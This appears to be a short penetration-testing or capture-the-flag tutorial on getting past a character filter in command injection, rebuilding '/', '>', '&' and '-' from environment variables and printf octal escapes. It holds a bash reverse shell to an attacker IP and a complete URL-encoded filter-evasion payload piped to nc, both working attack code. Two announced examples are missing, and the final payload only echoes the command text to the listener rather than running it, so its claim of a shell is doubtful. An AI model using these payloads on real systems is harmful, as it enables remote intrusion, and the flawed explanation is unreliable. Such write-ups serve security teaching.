Using ENV to escape Bad Characters
The characters '/ > & -' are filtered out (replaced) before our input reaches the shell, but we want a one-line reverse TCP shell. We can work around the missing characters with the methods below.
Concretely, our reverse shell command /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1 will not run as intended because every / is replaced, and so are the > and & of the redirections. How do we get around this?
First option: the environment may already contain a variable whose value is a character we need. In this example the / character is being filtered during the exploitation phase, and the environment looks like this:
# Env contains a variable
OLDPWD=/
HOME=/
PHP_FCGI_MAX_REQUESTS=500
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin
LANG=en_US.ISO8859-1
PHP_FCGI_CHILDREN=1
PWD=/var/db/rrd
Looking at the above Env values, we can replace / with ${HOME} (or $HOME), since HOME=/ . Note that it must be ${HOME}, not $(HOME): the latter is command substitution and would try to run a program called HOME. A character that only occurs inside a longer value, such as the - at the end of LANG=en_US.ISO8859-1, can be cut out with substring expansion of the form ${LANG:offset:length}. That expansion is a bash feature, so it works on a non-BSD target as follows:

But if the target's shell is a BSD /bin/sh, substring expansion is not available, so we cannot format the variable like that. Instead we build each character with printf and an octal escape. printf and its \NNN octal escapes are POSIX, so this works on both Linux and BSD; there is nothing Linux-specific about it:

To test this, we first print the reverse shell command with each bad character replaced by a variable built from printf:
# - character
a=$(printf "\55")
# / character
b=$(printf "\57")
# & character
c=$(printf "\46")
# > character
d=$(printf "\76")
For this example the full payload goes into a URL query string, so spaces are written as '+' (the web server decodes them back to spaces). The reverse shell payload now becomes:
a=$(printf+"\55");b=$(printf+"\57");c=$(printf+"\46");d=$(printf+"\76");echo+${b}bin${b}bash+${a}i+${d}${c}+${b}dev${b}tcp${b}10.10.14.39${b}443+0${d}${c}1|nc+10.10.14.39+443
The echo output is piped to nc, so our listener on 10.10.14.39:443 receives /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1, i.e. the substitution reproduces exactly the command that was being mangled before. Note that >& and /dev/tcp are bash features, which is why the command invokes /bin/bash explicitly rather than relying on the target's /bin/sh.
